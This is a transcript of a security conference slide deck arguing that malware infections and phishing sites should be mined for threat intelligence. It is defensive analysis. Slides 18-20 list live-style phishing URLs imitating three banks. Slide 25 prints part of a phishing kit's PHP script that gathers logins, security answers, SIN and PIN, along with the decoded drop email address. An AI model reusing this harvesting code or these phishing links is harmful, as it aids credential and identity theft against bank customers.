1 / 0

Malware & Phishing Intelligence

Malware & Phishing Intelligence. Agenda: Malware – “re-image vs. intelligence” Phishing – “takedown vs. intelligence”. What do you do with an Infected PC?. “Our policy is to re-image the computer. No questions. No exceptions.” Does that sound familiar?

terry
Download Presentation

Malware & Phishing Intelligence

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Malware & Phishing Intelligence

  2. Agenda: Malware – “re-image vs. intelligence” Phishing – “takedown vs. intelligence”
  3. What do you do with an Infected PC? “Our policy is to re-image the computer. No questions. No exceptions.” Does that sound familiar? We hear the argument that this is the “safest” option. What’s the worst that can happen?
  4. What is your Worst Case Scenario? Global Thermonuclear War?
  5. What is your Worst Case Malware Scenario? Data breach involving Intellectual Property? Direct Financial Loss? Data Breach Involving PII?
  6. Verizon 2013 Data Breach Investigations Report Study of 47,000 security incidents with 621 confirmed data breaches: 40% of all data breaches were caused by malware. 47% of those malware attacks originated with an E-mail attachment In “Large Enterprises” – 63% of malware attacks originated with an Email attachment. “Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment, and then install additional malware on that and other systems throughout the environment.” http://www.verizonenterprise.com/DBIR/2013/
  7. The inevitable Click How many emails do I have to send your employees to get someone to click on it? Three = 50% chance. Ten = “Guaranteed” ThreatSim.com Quoted in Verizon DBIR
  8. Recent Threats
  9. Top malicious spam of August 5, 2013
  10. typical This is what the AV detection looked like for Tuesday morning’s top malicious spam campaign. Four hours into the campaign, detection 2/46.
  11. Same malware, 13 hours later Detection rate now 17 vendors detecting
  12. Now what if AFTER all of that happens, we now realize the email had malware in it, and we send a PC tech to format BlueGuy’s machine? ATTACK!
  13. Long Detect Times Mandiant reported in “M-Trends 2013: Attack the Security Gap” that THE MEDIAN NUMBER OF DAYS from evidence of compromise to discovery of compromise was 243 DAYS! General Keith Alexander told an audience at Georgia Tech “Most of the folks who get into the networks are in there for six- to nine months before they’re discovered. M-Trends 2013: Attack the Security Gap™, https://www.mandiant.com/resources/m-trends/ March 2013. Prince, Brian, “NSA Director: Information-Sharing Critical to U.S. Cybersecurity”, www.darkreading.com/government-vertical/nsa-director-information-sharing-critica/240151955. March 29, 2013
  14. Malware Intelligence What CAN THIS MALWARE DO? Where did it come from? What was the initial attack vector? Has that vector contacted any other resource? What does this computer HAVE ACCESS TO? What has the infected computer DONE? Has the infected computer received additional files? Has the infected computer exfiltrated data? Are there any new accounts or files since infection? Has the infected computer exceeded or attempted to exceed authority on any internal resources?
  15. Today’s Top Threat Each day we document the behavior of the Top Threat emails What is the spam subject? What hostile URLs are advertised? What hostile attachments are present? What network touches does the malware make? What additional malware drops if executed?
  16. Cyber Intelligence? “The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.” http://www.sei.cmu.edu/library/assets/whitepapers/citp-summary-key-findings.pdf
  17. Phishing Intelligence
  18. February 27, 2013 http://www.go-polymers.com/components/rbc/index.php
  19. February 27, 2013 http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm
  20. February 22, 2013 http://www.go-polymers.com/admin/authentication.bns_Scotiabank/authentication.bns.htm http://www.go-polymers.com/admin/authentication.bns_Scotiabank/authentication.bns.htm
  21. Phishing Timeline (Takedown View) GOAL: Protect customer credentials by improving Takedown speed. Time is Money.
  22. Phishing Clusters For a single brand, we present the various phishing clusters seen against that brand. Phishing sites in the same cluster are composed of highly similar files.
  23. Trend Analysis By using the Conditional Formatting feature in i2, we can identify “emerging threats”. In this Conditional Formatting layout, phishing sites that were found in the current month are turned red and enlarged, while older phish are “greyed out”.
  24. Phishing Kits Phishing sites are usually made by hacking an existing website and uploading a set of files necessary to create the look and feel of the brand being imitated. Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message. When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.
  25. Confirm.php $data =" --------- G00dLuck --------- User: $user Pass: $pass ----- Q1: $q1 A1 $a1 Q2: $q2 A2 $a2 Q3: $q3 A3 $a3 ---- Dob: $dobd - $dobm - $doby SIN : $sin1 - $sin2 - $sin3 Dl : $dl Pin: $pin Issue: $issue E-mail: $email / $emailp -- Ip: $ip --------- G00dLuck ---------"; $emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t'); $emailusr2 = base64_decode(''); $subj="RBC # $user - $pass - $doby - $dl"; <?php $ip = $_SERVER['REMOTE_ADDR']; $user = $_POST['user']; $pass = $_POST['pass']; $q1 = $_POST['q1']; $a1 = $_POST['a1']; $q2 = $_POST['q2']; $a2 = $_POST['a2']; $q3 = $_POST['q3']; $a3 = $_POST['a3']; $sin1 = $_POST['sin1']; $sin2 = $_POST['sin2']; $sin3 = $_POST['sin3']; $dobd = $_POST['dobd']; $dobm = $_POST['dobm']; $doby = $_POST['doby']; $dl = $_POST['dl']; $issue = $_POST['issue']; $pin = $_POST['pin']; $email = $_POST['email']; $emailp = $_POST['emailp']; $emailusr1 = base64_decode( 'c29mb3RleDJAZ21haWwuY29t'); Which decodes to: sofotex2@gmail.com
  26. Overlaying Drop Email data Each red point indicates a criminal’s email. More lines = more phishing sites for that email.
  27. Phishing Timeline (Intelligence View) GOAL: Drive Major Criminals Away from OUR BRAND
  28. phishiq.com/submit We’re always looking for new sources of phishing or spam data. An online form is available, but feel free to contact if you are a “high volume” contributor.
  29. Thank you! Let’s discuss . . . Gary Warner www.malcovery.com @garwarner @malcovery
  30. Additional Discussion points . . .
  31. Infected machine Sensitive Data Inventory What data was ON the machine? What data could be ACCESSED FROM the machine? Was it accessed? Did it leave? Are there additional user accounts? What programs / files / DLLs have been added that are not “company standard” in the last 90 days Did this computer attempt any unusual internal resource loginsor accesses? (rate / userid / time of day / day of week)
  32. Best Case Scenario Malware was detected today A clear source of infection is readily identifiable from today Only a single “unexplained” EXE or DLL is found on the machine, and it matches the signature The malware is well understood, widely detected, and has a clear and limited purpose
  33. Our Porous Perimeters Is the machine mobile? Is it “forced VPN” back to our organization? If mobile, and if unlimited access – we don’t know what it did at or outside the perimeter because we don’t control the perimeter Home network, Starbucks wifi, hotel wifi– data exfil could occur in places where we don’t monitor the network
More Related